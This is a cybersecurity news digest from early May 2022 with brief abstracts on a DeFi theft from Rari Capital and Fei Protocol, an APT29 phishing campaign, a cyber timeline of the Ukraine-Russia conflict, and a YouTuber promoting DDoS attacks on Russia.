Hackers stole +80M from DeFi platforms Rari Capital and Fei Protocol Full Text
Abstract
Threat actors exploited a bug in the Fuse protocol used by DeFi platforms Rari Capital and Fei Protocol and stole more than $80 million. Threat actors stole more than $80 million from the decentralized finance (DeFi) platforms Rari Capital and Fei Protocol...Security Affairs
May 01, 2022 – Hacker
Russian hackers compromise embassy emails to target governments Full Text
Abstract
Security analysts have uncovered a recent phishing campaign from Russian hackers known as APT29 (Cozy Bear or Nobelium) targeting diplomats and government entities.BleepingComputer
May 1, 2022 – General
Apr 24 – Apr 30 Ukraine – Russia the silent cyber conflict Full Text
Abstract
This post provides a timeline of the events related to the Russian invasion of Ukraine from the cyber security perspective. Below is the timeline of the events related to the ongoing invasion that occurred in the previous weeks: April 30 - Pro-Russian...Security Affairs
May 01, 2022 – Denial Of Service
A YouTuber is promoting DDoS attacks on Russia — how legal is this? Full Text
Abstract
A YouTube influencer with hundreds of thousands of subscribers is encouraging everyone to conduct cyber warfare against Russia. How risky is it and can you get in trouble?BleepingComputer
May 1, 2022 – General
Security Affairs newsletter Round 363 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....Security Affairs